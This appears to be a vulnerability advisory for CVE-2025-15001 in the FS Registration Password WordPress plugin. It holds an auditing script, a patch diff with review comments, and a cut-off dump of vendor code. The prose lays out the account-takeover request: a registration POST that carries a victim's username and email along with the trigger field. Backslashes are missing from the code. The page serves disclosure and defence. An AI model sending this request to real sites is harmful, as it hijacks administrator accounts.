Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-15001: FS Registration Password <= 1.0.1 – Unauthenticated Privilege Escalation via Account Takeover (registration-password)

Severity: Critical (CVSS 9.8)
CWE: 639
Vulnerable Version: 1.0.1
Patched Version: 2.0.1
Disclosed: January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-15001:
The FS Registration Password WordPress plugin, versions up to and including 1.0.1, contains an unauthenticated privilege escalation vulnerability. This flaw allows any attacker to reset the password of any user account, including administrators, leading to a complete account takeover. The vulnerability stems from improper identity validation during the password setting process for new user registrations.

Atomic Edge research identifies the root cause in the plugin’s `setUserPassword` function within the `Auth.php` class (`registration-password/src/WP/Auth.php`). This function hooks into the `random_password` filter. The function checks for the presence of a custom POST parameter `fs_is_password_for_registration` with a value of `'yes'`. If this condition is met, the function returns the raw value from `$_POST['pass1']` as the new user’s password. The critical flaw is the complete absence of any user identity verification. The function does not validate that the user whose password is being set is the same user performing the action, nor does it require any authentication. The filter runs during user creation, but the logic fails to ensure the request is tied to a legitimate, in-progress registration for the target user.

Exploitation involves sending a POST request to the WordPress user registration endpoint, `wp-login.php?action=register`. The attacker must include standard registration parameters (`user_login`, `user_email`, `pass1`) but can set the `user_login` and `user_email` fields to match the credentials of an existing victim account. The attacker must also include the plugin’s trigger parameter `fs_is_password_for_registration=yes`. The WordPress core will process this as a new user registration attempt. Because the target username and email already exist, WordPress will return an error, but the `setUserPassword` filter executes before this error is returned. The filter overwrites the existing user’s hashed password in the database with the attacker-provided `pass1` value, successfully changing the victim’s password without any authentication.

The patch in version 2.0.1 completely rewrites the plugin’s architecture and logic. The vulnerable `Auth.php` class and its `setUserPassword` function are removed. The new implementation in `namespace.php` uses the `wp_pre_insert_user_data` filter instead of `random_password`. The new `set_user_custom_password_for_registration` function adds multiple layers of validation before allowing a password change. It verifies the request is a POST, checks for the presence of `wp-submit=Register`, validates that the submitted `user_login` and `user_email` match the data array passed to the filter (which contains the new user’s data), and crucially, adds a nonce check via `wp_verify_nonce`. This nonce, generated on the registration form, ties the password submission to a specific, legitimate registration session, preventing parameter injection attacks against existing users.

Successful exploitation grants an attacker full control over any user account. Attackers can compromise administrator accounts to install backdoors, modify site content, exfiltrate sensitive data, or delete the website. For multi-site installations, a compromised super administrator can affect the entire network. The vulnerability provides a direct path to site ownership with a CVSS score of 9.8 (Critical), reflecting the trivial attack complexity, lack of privileges required, and high impact on confidentiality, integrity, and availability.
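To find installs that still carry the affected code, the following added example (not Atomic Edge's or the plugin author's code) classifies copies of the plugin by the `Version` header and by the two code markers visible in the removed `Auth.php`. The sample plugin trees are constructed, and the function names and the `review` verdict are assumptions of this example.

```python
import re
import tempfile
from pathlib import Path

MAIN_FILE = "fs-registration-password.php"   # main plugin file named in the diff
LAST_VULNERABLE = (1, 0, 1)                  # advisory: versions <= 1.0.1
# Markers taken from the removed src/WP/Auth.php in the diff.
MARKERS = {
    "random_password hook": re.compile(r"add_filter\(\s*['\"]random_password['\"]"),
    "trigger field": re.compile(r"fs_is_password_for_registration"),
}
VERSION_RE = re.compile(r"^[ \t/*#@]*Version:\s*(\d+(?:\.\d+)*)", re.M | re.I)


def parse_version(header_text):
    """Return the plugin header version as a tuple of ints, or None."""
    m = VERSION_RE.search(header_text[:8192])  # WordPress reads the first 8 KiB
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def audit_plugin(plugin_dir):
    """Classify one plugin directory: vulnerable / review / patched / unknown."""
    plugin_dir = Path(plugin_dir)
    header = (plugin_dir / MAIN_FILE).read_text(encoding="utf-8", errors="replace")
    version = parse_version(header)
    hits = []
    for php in sorted(plugin_dir.rglob("*.php")):
        src = php.read_text(encoding="utf-8", errors="replace")
        for name, pattern in MARKERS.items():
            if pattern.search(src):
                hits.append((php.relative_to(plugin_dir).as_posix(), name))
    if version is not None and version <= LAST_VULNERABLE:
        verdict = "vulnerable"
    elif hits:
        # Header looks new (or is missing) but old code is still on disk.
        verdict = "review"
    elif version is not None:
        verdict = "patched"
    else:
        verdict = "unknown"
    return {"version": version, "markers": hits, "verdict": verdict}


def audit_tree(plugins_root):
    """Audit every directory under plugins_root that holds the main file."""
    return {
        main.parent.name: audit_plugin(main.parent)
        for main in sorted(Path(plugins_root).glob(f"*/{MAIN_FILE}"))
    }


def build_demo_tree(root):
    """Write three constructed plugin copies (not real plugin source)."""
    samples = {
        "site-a": ("1.0.1", {
            "src/WP/Auth.php":
                "<?php add_filter('random_password', [$this, 'setUserPassword']);\n"
                "// <input name=\"fs_is_password_for_registration\" value=\"yes\">\n",
        }),
        "site-b": ("2.0.1", {
            "inc/namespace.php":
                "<?php add_filter('wp_pre_insert_user_data', 'cb', 10, 2);\n",
        }),
        # Header says 2.0.1, but the old class was left behind by a partial upgrade.
        "site-c": ("2.0.1", {
            "src/WP/Auth.php":
                "<?php add_filter( \"random_password\", [$this, 'setUserPassword']);\n",
        }),
    }
    for name, (version, files) in samples.items():
        plugin = Path(root) / name
        plugin.mkdir(parents=True)
        (plugin / MAIN_FILE).write_text(
            "<?php\n/**\n * Plugin Name: FS Registration Password\n"
            f" * Version: {version}\n * Requires at least: 5.9\n */\n",
            encoding="utf-8",
        )
        for rel, body in files.items():
            target = plugin / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        for name, result in audit_tree(tmp).items():
            print(name, result["verdict"], result["version"], result["markers"])
```

Point `audit_tree` at a real `wp-content/plugins` directory to use it; a `review` verdict means the header reports a fixed version while files matching the old markers remain on disk.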

Differential between vulnerable and patched code

Code Diff
--- a/registration-password/fs-registration-password.php
+++ b/registration-password/fs-registration-password.php
@@ -1,25 +1,22 @@
 <?php
 /**
- * Plugin Name: Registration Password
+ * Plugin Name: FS Registration Password
  * Plugin URI: https://github.com/fsylum/fs-registration-password
  * Description: Allow users to set their own password during site registration
- * Version: 1.0.1
+ * Version: 2.0.1
  * Author: Firdaus Zahari
  * Author URI: https://fsylum.net
- * Requires at least: 5.6
- * Requires PHP:      7.3
+ * License: GPLv2 or later
+ * License URI: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
+ * Tested up to: 6.9
+ * Requires at least: 5.9
+ * Requires PHP: 8.2
  */

-require __DIR__ . '/vendor/autoload.php';
+namespace FsylumRegistrationPassword;

-define('FSRP_PLUGIN_URL', untrailingslashit(plugin_dir_url(__FILE__)));
-define('FSRP_PLUGIN_PATH', untrailingslashit(plugin_dir_path(__FILE__)));
-define('FSRP_PLUGIN_BASENAME', plugin_basename(__FILE__));
-define('FSRP_PLUGIN_VERSION', '1.0.1');
+if ( ! defined( 'ABSPATH' ) ) exit;

-$app = new FsylumRegistrationPasswordApp;
+require __DIR__ . '/inc/namespace.php';

-$app->addService(new FsylumRegistrationPasswordWPAuth);
-
-// Finally run it
-$app->run();
+bootstrap();
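Review bot: the header lines `Requires at least: 5.9` and `Requires PHP: 8.2` raise the minimum platform in the same release that carries the security fix, so an install running on the previously supported PHP 7.3 or WordPress 5.6 has no patched version it can move to. Consider backporting the fix to a 1.0.x release, or state the requirement jump prominently in the changelog so operators on older stacks know to deactivate the plugin instead of waiting for an update.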
--- a/registration-password/inc/namespace.php
+++ b/registration-password/inc/namespace.php
@@ -0,0 +1,162 @@
+<?php
+
+namespace FsylumRegistrationPassword;
+
+
+use WP_Error;
+use WP_User;
+
+if ( ! defined( 'ABSPATH' ) ) exit;
+
+function bootstrap() {
+	add_action('login_enqueue_scripts', __NAMESPACE__ . '\load_user_profile_script');
+	add_action('register_form', __NAMESPACE__ . '\add_password_fields_to_the_registration_page');
+	add_filter('registration_errors', __NAMESPACE__ . '\validate_password_after_submission');
+	add_filter('wp_pre_insert_user_data', __NAMESPACE__ . '\set_user_custom_password_for_registration', 10, 2);
+	add_filter('wp_new_user_notification_email', __NAMESPACE__ . '\modify_new_user_registration_email_message', 10, 2);
+}
+
+/**
+ * Load user-profile script on the registration page.
+ *
+ * @return void
+ */
+function load_user_profile_script(): void {
+	if (!wp_script_is('user-profile')) {
+		wp_enqueue_script('user-profile');
+	}
+}
+
+/**
+ * Add a slightly modified version of password fields on the registration page based on wp-login.php.
+ *
+ * @return void
+ */
+function add_password_fields_to_the_registration_page(): void {
+    wp_nonce_field('fs_registration_password_nonce', 'fs_registration_password_nonce');
+	?>
+    <div class="user-pass1-wrap">
+        <p>
+            <label for="pass1"><?php esc_html_e('Password', 'fs-registration-password'); ?></label>
+        </p>
+
+        <div class="wp-pwd">
+            <input type="password" data-reveal="1" data-pw="<?php echo esc_attr(wp_generate_password(16)); ?>" name="pass1" id="pass1" class="input password-input" size="24" value="" autocomplete="new-password" aria-describedby="pass-strength-result">
+
+            <button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="<?php esc_attr_e('Hide password', 'fs-registration-password'); ?>">
+                <span class="dashicons dashicons-hidden" aria-hidden="true"></span>
+            </button>
+            <div id="pass-strength-result" class="hide-if-no-js" aria-live="polite"><?php esc_html_e('Strength indicator', 'fs-registration-password'); ?></div>
+        </div>
+        <div class="pw-weak">
+            <input type="checkbox" name="pw_weak" id="pw-weak" class="pw-checkbox">
+            <label for="pw-weak"><?php esc_html_e('Confirm use of weak password', 'fs-registration-password'); ?></label>
+        </div>
+    </div>
+
+    <p class="user-pass2-wrap">
+        <label for="pass2"><?php esc_html_e('Confirm password', 'fs-registration-password'); ?></label>
+        <input type="password" name="pass2" id="pass2" class="input" size="20" value="" autocomplete="new-password" spellcheck="false">
+    </p>
+
+    <p class="description indicator-hint"><?php esc_html(wp_get_password_hint()); ?></p>
+	<?php
+}
+
+/**
+ * Ensure that password is not empty before registering the user.
+ *
+ * @param WP_Error $errors A WP_Error object containing any errors encountered during registration.
+ *
+ * @return WP_Error
+ */
+function validate_password_after_submission(WP_Error $errors): WP_Error {
+    // No verification required as we are only checking for value existence.
+    // phpcs:ignore WordPress.Security.NonceVerification.Missing
+	if (empty($_POST['pass1'])) {
+		$errors->add('empty_password', '<strong>Error</strong>: Please enter your password.');
+	}
+
+	return $errors;
+}
+
+/**
+ * @param array $data The current user data to be inserted
+ * @param bool $update Whether the user is being updated rather than created.
+ *
+ * @return array
+ */
+function set_user_custom_password_for_registration(array $data, bool $update): array {
+	if ($update) {
+		return $data;
+	}
+
+    if (!isset($_SERVER['REQUEST_METHOD'])) {
+        return $data;
+    }
+
+	if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
+		return $data;
+	}
+
+	if ( !isset($_POST['wp-submit'])) {
+		return $data;
+	}
+
+	if ( !isset($_POST['user_login'])) {
+		return $data;
+	}
+
+	if ( !isset($_POST['user_email'])) {
+		return $data;
+	}
+
+	if ( !isset($_POST['pass1'])) {
+		return $data;
+	}
+
+	if ($_POST['user_login'] !== $data['user_login']) {
+		return $data;
+	}
+
+	if ($_POST['user_email'] !== $data['user_email']) {
+		return $data;
+	}
+
+	if ($_POST['wp-submit'] !== 'Register') {
+		return $data;
+	}
+
+	if (!isset($_POST['fs_registration_password_nonce']) ) {
+		return $data;
+	}
+
+	// Intentionally not sanitised because we're validating the nonce.
+	// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+    if (!wp_verify_nonce(wp_unslash($_POST['fs_registration_password_nonce']), 'fs_registration_password_nonce')) {
+        return $data;
+    }
+
+    // Intentionally not sanitised because we're hashing the raw input.
+    // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized
+	$data['user_pass'] = wp_hash_password(wp_unslash($_POST['pass1']));
+
+	return $data;
+}
+
+/**
+ * @param array $wp_new_user_notification_email Current WP mail data
+ * @param WP_User $user User object for new user.
+ *
+ * @return array
+ */
+function modify_new_user_registration_email_message(array $wp_new_user_notification_email, WP_User $user): array {
+	/* translators: %s: The current user's username */
+	$message  = sprintf(__('Username: %s', 'fs-registration-password'), $user->user_login) . "rnrn";
+	$message .= __('You can now log in to the site using the password you've provided during the registration.', 'fs-registration-password') . "rnrn";
+	$message .= wp_login_url() . "rn";
+
+	$wp_new_user_notification_email['message'] = $message;
+
+	return $wp_new_user_notification_email;
+}
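Review bot: in `set_user_custom_password_for_registration`, `$_POST['user_login']` and `$_POST['user_email']` are compared to `$data` raw, while the nonce and `pass1` a few lines below go through `wp_unslash()`. Any value that differs only by slashing fails the `!==` check and the function returns `$data` unchanged without reporting anything, so the account keeps its generated password while `modify_new_user_registration_email_message` still tells the user to log in with the password they provided. Unslash both fields before comparing and surface the mismatch (for example through the `registration_errors` filter already registered in `bootstrap()`) instead of falling through silently. Separately, `<?php esc_html(wp_get_password_hint()); ?>` in the form template has no `echo`, so the hint paragraph renders empty.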
--- a/registration-password/src/App.php
+++ b/registration-password/src/App.php
@@ -1,22 +0,0 @@
-<?php
-
-namespace FsylumRegistrationPassword;
-
-use FsylumRegistrationPasswordContractsRunnable;
-
-class App
-{
-    protected $services = [];
-
-    public function addService(Runnable $service)
-    {
-        $this->services[] = $service;
-    }
-
-    public function run()
-    {
-        foreach ($this->services as $service) {
-            $service->run();
-        }
-    }
-}
--- a/registration-password/src/Contracts/Runnable.php
+++ b/registration-password/src/Contracts/Runnable.php
@@ -1,8 +0,0 @@
-<?php
-
-namespace FsylumRegistrationPasswordContracts;
-
-interface Runnable
-{
-    public function run();
-}
--- a/registration-password/src/WP/Auth.php
+++ b/registration-password/src/WP/Auth.php
@@ -1,91 +0,0 @@
-<?php
-
-namespace FsylumRegistrationPasswordWP;
-
-use FsylumRegistrationPasswordContractsRunnable;
-
-class Auth implements Runnable
-{
-    public function run()
-    {
-        add_action('login_enqueue_scripts', [$this, 'loadUserProfileJs']);
-        add_action('register_form', [$this, 'addPasswordFields']);
-        add_filter('registration_errors', [$this, 'validatePassword']);
-        add_filter('random_password', [$this, 'setUserPassword']);
-        add_filter('wp_new_user_notification_email', [$this, 'modifyEmailNotification'], 10, 2);
-    }
-
-    public function loadUserProfileJs()
-    {
-        if (!wp_script_is('user-profile')) {
-            wp_enqueue_script('user-profile');
-        }
-    }
-
-    public function addPasswordFields()
-    {
-        // taken directly from wp-login.php, with slight modification to suit the context
-        ?>
-            <input type="hidden" name="fs_is_password_for_registration" value="yes">
-            <div class="user-pass1-wrap">
-                <p>
-                    <label for="pass1"><?php _e('Password'); ?></label>
-                </p>
-
-                <div class="wp-pwd">
-                    <input type="password" data-reveal="1" data-pw="<?php echo esc_attr(wp_generate_password(16)); ?>" name="pass1" id="pass1" class="input password-input" size="24" value="" autocomplete="off" aria-describedby="pass-strength-result">
-
-                    <button type="button" class="button button-secondary wp-hide-pw hide-if-no-js" data-toggle="0" aria-label="<?php esc_attr_e('Hide password'); ?>">
-                        <span class="dashicons dashicons-hidden" aria-hidden="true"></span>
-                    </button>
-                    <div id="pass-strength-result" class="hide-if-no-js" aria-live="polite"><?php _e('Strength indicator'); ?></div>
-                </div>
-                <div class="pw-weak">
-                    <input type="checkbox" name="pw_weak" id="pw-weak" class="pw-checkbox">
-                    <label for="pw-weak"><?php _e('Confirm use of weak password'); ?></label>
-                </div>
-            </div>
-
-            <p class="user-pass2-wrap">
-                <label for="pass2"><?php _e('Confirm password'); ?></label>
-                <input type="password" name="pass2" id="pass2" class="input" size="20" value="" autocomplete="off">
-            </p>
-
-            <p class="description indicator-hint"><?php echo wp_get_password_hint(); ?></p>
-            <br class="clear">
-        <?php
-    }
-
-    public function validatePassword($errors)
-    {
-        if (empty($_POST['pass1'])) {
-            $errors->add('empty_password', '<strong>Error</strong>: Please enter your password.');
-        }
-
-        return $errors;
-    }
-
-    public function setUserPassword($password)
-    {
-        if (!isset($_POST['fs_is_password_for_registration']) ) {
-            return $password;
-        }
-
-        if (sanitize_text_field($_POST['fs_is_password_for_registration']) !== 'yes') {
-            return $password;
-        }
-
-        return $_POST['pass1'];
-    }
-
-    public function modifyEmailNotification($wp_new_user_notification_email, $user)
-    {
-        $message  = sprintf(__('Username: %s'), $user->user_login) . "rnrn";
-        $message .= __('You can now log in to the site using the password you've provided during the registration.') . "rnrn";
-        $message .= wp_login_url() . "rn";
-
-        $wp_new_user_notification_email['message'] = $message;
-
-        return $wp_new_user_notification_email;
-    }
-}
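Review bot: the removed `setUserPassword` is gated only on the `fs_is_password_for_registration` POST field and then returns `$_POST['pass1']` from the `random_password` filter, with nothing in the callback tying the call to the registration in progress. Since this release deletes the hidden input together with the class, add a regression test that a POST carrying `fs_is_password_for_registration=yes` no longer influences any generated password, and confirm the upgrade path removes `src/WP/Auth.php` from disk rather than leaving it beside the new `inc/namespace.php`.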
--- a/registration-password/vendor/autoload.php
+++ b/registration-password/vendor/autoload.php
@@ -1,7 +0,0 @@
-<?php
-
-// autoload.php @generated by Composer
-
-require_once __DIR__ . '/composer/autoload_real.php';
-
-return ComposerAutoloaderInit79e22c08f5c32b16bcd5346f5430b3bc::getLoader();
--- a/registration-password/vendor/composer/ClassLoader.php
+++ b/registration-password/vendor/composer/ClassLoader.php
@@ -1,481 +0,0 @@
-<?php
-
-/*
- * This file is part of Composer.
- *
- * (c) Nils Adermann <naderman@naderman.de>
- *     Jordi Boggiano <j.boggiano@seld.be>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace ComposerAutoload;
-
-/**
- * ClassLoader implements a PSR-0, PSR-4 and classmap class loader.
- *
- *     $loader = new ComposerAutoloadClassLoader();
- *
- *     // register classes with namespaces
- *     $loader->add('SymfonyComponent', __DIR__.'/component');
- *     $loader->add('Symfony',           __DIR__.'/framework');
- *
- *     // activate the autoloader
- *     $loader->register();
- *
- *     // to enable searching the include path (eg. for PEAR packages)
- *     $loader->setUseIncludePath(true);
- *
- * In this example, if you try to use a class in the SymfonyComponent
- * namespace or one of its children (SymfonyComponentConsole for instance),
- * the autoloader will first look for the class under the component/
- * directory, and it will then fallback to the framework/ directory if not
- * found before giving up.
- *
- * This class is loosely based on the Symfony UniversalClassLoader.
- *
- * @author Fabien Potencier <fabien@symfony.com>
- * @author Jordi Boggiano <j.boggiano@seld.be>
- * @see    https://www.php-fig.org/psr/psr-0/
- * @see    https://www.php-fig.org/psr/psr-4/
- */
-class ClassLoader
-{
-    private $vendorDir;
-
-    // PSR-4
-    private $prefixLengthsPsr4 = array();
-    private $prefixDirsPsr4 = array();
-    private $fallbackDirsPsr4 = array();
-
-    // PSR-0
-    private $prefixesPsr0 = array();
-    private $fallbackDirsPsr0 = array();
-
-    private $useIncludePath = false;
-    private $classMap = array();
-    private $classMapAuthoritative = false;
-    private $missingClasses = array();
-    private $apcuPrefix;
-
-    private static $registeredLoaders = array();
-
-    public function __construct($vendorDir = null)
-    {
-        $this->vendorDir = $vendorDir;
-    }
-
-    public function getPrefixes()
-    {
-        if (!empty($this->prefixesPsr0)) {
-            return call_user_func_array('array_merge', array_values($this->prefixesPsr0));
-        }
-
-        return array();
-    }
-
-    public function getPrefixesPsr4()
-    {
-        return $this->prefixDirsPsr4;
-    }
-
-    public function getFallbackDirs()
-    {
-        return $this->fallbackDirsPsr0;
-    }
-
-    public function getFallbackDirsPsr4()
-    {
-        return $this->fallbackDirsPsr4;
-    }
-
-    public function getClassMap()
-    {
-        return $this->classMap;
-    }
-
-    /**
-     * @param array $classMap Class to filename map
-     */
-    public function addClassMap(array $classMap)
-    {
-        if ($this->classMap) {
-            $this->classMap = array_merge($this->classMap, $classMap);
-        } else {
-            $this->classMap = $classMap;
-        }
-    }
-
-    /**
-     * Registers a set of PSR-0 directories for a given prefix, either
-     * appending or prepending to the ones previously set for this prefix.
-     *
-     * @param string       $prefix  The prefix
-     * @param array|string $paths   The PSR-0 root directories
-     * @param bool         $prepend Whether to prepend the directories
-     */
-    public function add($prefix, $paths, $prepend = false)
-    {
-        if (!$prefix) {
-            if ($prepend) {
-                $this->fallbackDirsPsr0 = array_merge(
-                    (array) $paths,
-                    $this->fallbackDirsPsr0
-                );
-            } else {
-                $this->fallbackDirsPsr0 = array_merge(
-                    $this->fallbackDirsPsr0,
-                    (array) $paths
-                );
-            }
-
-            return;
-        }
-
-        $first = $prefix[0];
-        if (!isset($this->prefixesPsr0[$first][$prefix])) {
-            $this->prefixesPsr0[$first][$prefix] = (array) $paths;
-
-            return;
-        }
-        if ($prepend) {
-            $this->prefixesPsr0[$first][$prefix] = array_merge(
-                (array) $paths,
-                $this->prefixesPsr0[$first][$prefix]
-            );
-        } else {
-            $this->prefixesPsr0[$first][$prefix] = array_merge(
-                $this->prefixesPsr0[$first][$prefix],
-                (array) $paths
-            );
-        }
-    }
-
-    /**
-     * Registers a set of PSR-4 directories for a given namespace, either
-     * appending or prepending to the ones previously set for this namespace.
-     *
-     * @param string       $prefix  The prefix/namespace, with trailing '\'
-     * @param array|string $paths   The PSR-4 base directories
-     * @param bool         $prepend Whether to prepend the directories
-     *
-     * @throws InvalidArgumentException
-     */
-    public function addPsr4($prefix, $paths, $prepend = false)
-    {
-        if (!$prefix) {
-            // Register directories for the root namespace.
-            if ($prepend) {
-                $this->fallbackDirsPsr4 = array_merge(
-                    (array) $paths,
-                    $this->fallbackDirsPsr4
-                );
-            } else {
-                $this->fallbackDirsPsr4 = array_merge(
-                    $this->fallbackDirsPsr4,
-                    (array) $paths
-                );
-            }
-        } elseif (!isset($this->prefixDirsPsr4[$prefix])) {
-            // Register directories for a new namespace.
-            $length = strlen($prefix);
-            if ('\' !== $prefix[$length - 1]) {
-                throw new InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator.");
-            }
-            $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length;
-            $this->prefixDirsPsr4[$prefix] = (array) $paths;
-        } elseif ($prepend) {
-            // Prepend directories for an already registered namespace.
-            $this->prefixDirsPsr4[$prefix] = array_merge(
-                (array) $paths,
-                $this->prefixDirsPsr4[$prefix]
-            );
-        } else {
-            // Append directories for an already registered namespace.
-            $this->prefixDirsPsr4[$prefix] = array_merge(
-                $this->prefixDirsPsr4[$prefix],
-                (array) $paths
-            );
-        }
-    }
-
-    /**
-     * Registers a set of PSR-0 directories for a given prefix,
-     * replacing any others previously set for this prefix.
-     *
-     * @param string       $prefix The prefix
-     * @param array|string $paths  The PSR-0 base directories
-     */
-    public function set($prefix, $paths)
-    {
-        if (!$prefix) {
-            $this->fallbackDirsPsr0 = (array) $paths;
-        } else {
-            $this->prefixesPsr0[$prefix[0]][$prefix] = (array) $paths;
-        }
-    }
-
-    /**
-     * Registers a set of PSR-4 directories for a given namespace,
-     * replacing any others previously set for this namespace.
-     *
-     * @param string       $prefix The prefix/namespace, with trailing '\'
-     * @param array|string $paths  The PSR-4 base directories
-     *
-     * @throws InvalidArgumentException
-     */
-    public function setPsr4($prefix, $paths)
-    {
-        if (!$prefix) {
-            $this->fallbackDirsPsr4 = (array) $paths;
-        } else {
-            $length = strlen($prefix);
-            if ('\' !== $prefix[$length - 1]) {
-                throw new InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator.");
-            }
-            $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length;
-            $this->prefixDirsPsr4[$prefix] = (array) $paths;
-        }
-    }
-
-    /**
-     * Turns on searching the include path for class files.
-     *
-     * @param bool $useIncludePath
-     */
-    public function setUseIncludePath($useIncludePath)
-    {
-        $this->useIncludePath = $useIncludePath;
-    }
-
-    /**
-     * Can be used to check if the autoloader uses the include path to check
-     * for classes.
-     *
-     * @return bool
-     */
-    public function getUseIncludePath()
-    {
-        return $this->useIncludePath;
-    }
-
-    /**
-     * Turns off searching the prefix and fallback directories for classes
-     * that have not been registered with the class map.
-     *
-     * @param bool $classMapAuthoritative
-     */
-    public function setClassMapAuthoritative($classMapAuthoritative)
-    {
-        $this->classMapAuthoritative = $classMapAuthoritative;
-    }
-
-    /**
-     * Should class lookup fail if not found in the current class map?
-     *
-     * @return bool
-     */
-    public function isClassMapAuthoritative()
-    {
-        return $this->classMapAuthoritative;
-    }
-
-    /**
-     * APCu prefix to use to cache found/not-found classes, if the extension is enabled.
-     *
-     * @param string|null $apcuPrefix
-     */
-    public function setApcuPrefix($apcuPrefix)
-    {
-        $this->apcuPrefix = function_exists('apcu_fetch') && filter_var(ini_get('apc.enabled'), FILTER_VALIDATE_BOOLEAN) ? $apcuPrefix : null;
-    }
-
-    /**
-     * The APCu prefix in use, or null if APCu caching is not enabled.
-     *
-     * @return string|null
-     */
-    public function getApcuPrefix()
-    {
-        return $this->apcuPrefix;
-    }
-
-    /**
-     * Registers this instance as an autoloader.
-     *
-     * @param bool $prepend Whether to prepend the autoloader or not
-     */
-    public function register($prepend = false)
-    {
-        spl_autoload_register(array($this, 'loadClass'), true, $prepend);
-
-        if (null === $this->vendorDir) {
-            return;
-        }
-
-        if ($prepend) {
-            self::$registeredLoaders = array($this->vendorDir => $this) + self::$registeredLoaders;
-        } else {
-            unset(self::$registeredLoaders[$this->vendorDir]);
-            self::$registeredLoaders[$this->vendorDir] = $this;
-        }
-    }
-
-    /**
-     * Unregisters this instance as an autoloader.
-     */
-    public function unregister()
-    {
-        spl_autoload_unregister(array($this, 'loadClass'));
-
-        if (null !== $this->vendorDir) {
-            unset(self::$registeredLoaders[$this->vendorDir]);
-        }
-    }
-
-    /**
-     * Loads the given class or interface.
-     *
-     * @param  string    $class The name of the class
-     * @return true|null True if loaded, null otherwise
-     */
-    public function loadClass($class)
-    {
-        if ($file = $this->findFile($class)) {
-            includeFile($file);
-
-            return true;
-        }
-
-        return null;
-    }
-
-    /**
-     * Finds the path to the file where the class is defined.
-     *
-     * @param string $class The name of the class
-     *
-     * @return string|false The path if found, false otherwise
-     */
-    public function findFile($class)
-    {
-        // class map lookup
-        if (isset($this->classMap[$class])) {
-            return $this->classMap[$class];
-        }
-        if ($this->classMapAuthoritative || isset($this->missingClasses[$class])) {
-            return false;
-        }
-        if (null !== $this->apcuPrefix) {
-            $file = apcu_fetch($this->apcuPrefix.$class, $hit);
-            if ($hit) {
-                return $file;
-            }
-        }
-
-        $file = $this->findFileWithExtension($class, '.php');
-
-        // Search for Hack files if we are running on HHVM
-        if (false === $file && defined('HHVM_VERSION')) {
-            $file = $this->findFileWithExtension($class, '.hh');
-        }
-
-        if (null !== $this->apcuPrefix) {
-            apcu_add($this->apcuPrefix.$class, $file);
-        }
-
-        if (false === $file) {
-            // Remember that this class does not exist.
-            $this->missingClasses[$class] = true;
-        }
-
-        return $file;
-    }
-
-    /**
-     * Returns the currently registered loaders indexed by their corresponding vendor directories.
-     *
-     * @return self[]
-     */
-    public static function getRegisteredLoaders()
-    {
-        return self::$registeredLoaders;
-    }
-
-    private function findFileWithExtension($class, $ext)
-    {
-        // PSR-4 lookup
-        $logicalPathPsr4 = strtr($class, '\', DIRECTORY_SEPARATOR) . $ext;
-
-        $first = $class[0];
-        if (isset($this->prefixLengthsPsr4[$first])) {
-            $subPath = $class;
-            while (false !== $lastPos = strrpos($subPath, '\')) {
-                $subPath = substr($subPath, 0, $lastPos);
-                $search = $subPath . '\';
-                if (isset($this->prefixDirsPsr4[$search])) {
-                    $pathEnd = DIRECTORY_SEPARATOR . substr($logicalPathPsr4, $lastPos + 1);
-                    foreach ($this->prefixDirsPsr4[$search] as $dir) {
-                        if (file_exists($file = $dir . $pathEnd)) {
-                            return $file;
-                        }
-                    }
-                }
-            }
-        }
-
-        // PSR-4 fallback dirs
-        foreach ($this->fallbackDirsPsr4 as $dir) {
-            if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr4)) {
-                return $file;
-            }
-        }
-
-        // PSR-0 lookup
-        if (false !== $pos = strrpos($class, '\')) {
-            // namespaced class name
-            $logicalPathPsr0 = substr($logicalPathPsr4, 0, $pos + 1)
-                . strtr(substr($logicalPathPsr4, $pos + 1), '_', DIRECTORY_SEPARATOR);
-        } else {
-            // PEAR-like class name
-            $logicalPathPsr0 = strtr($class, '_', DIRECTORY_SEPARATOR) . $ext;
-        }
-
-        if (isset($this->prefixesPsr0[$first])) {
-            foreach ($this->prefixesPsr0[$first] as $prefix => $dirs) {
-                if (0 === strpos($class, $prefix)) {
-                    foreach ($dirs as $dir) {
-                        if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) {
-                            return $file;
-                        }
-                    }
-                }
-            }
-        }
-
-        // PSR-0 fallback dirs
-        foreach ($this->fallbackDirsPsr0 as $dir) {
-            if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) {
-                return $file;
-            }
-        }
-
-        // PSR-0 include paths.
-        if ($this->useIncludePath && $file = stream_resolve_include_path($logicalPathPsr0)) {
-            return $file;
-        }
-
-        return false;
-    }
-}
-
-/**
- * Scope isolated include.
- *
- * Prevents access to $this/self from included files.
- */
-function includeFile($file)
-{
-    include $file;
-}
--- a/registration-password/vendor/composer/InstalledVersions.php
+++ b/registration-password/vendor/composer/InstalledVersions.php
@@ -1,337 +0,0 @@
-<?php
-
-/*
- * This file is part of Composer.
- *
- * (c) Nils Adermann <naderman@naderman.de>
- *     Jordi Boggiano <j.boggiano@seld.be>
- *
- * For the full copyright and license information, please view the LICENSE
- * file that was distributed with this source code.
- */
-
-namespace Composer;
-
-use ComposerAutoloadClassLoader;
-use ComposerSemverVersionParser;
-
-/**
- * This class is copied in every Composer installed project and available to all
- *
- * See also https://getcomposer.org/doc/07-runtime.md#installed-versions
- *
- * To require it's presence, you can require `composer-runtime-api ^2.0`
- */
-class InstalledVersions
-{
-    private static $installed;
-    private static $canGetVendors;
-    private static $installedByVendor = array();
-
-    /**
-     * Returns a list of all package names which are present, either by being installed, replaced or provided
-     *
-     * @return string[]
-     * @psalm-return list<string>
-     */
-    public static function getInstalledPackages()
-    {
-        $packages = array();
-        foreach (self::getInstalled() as $installed) {
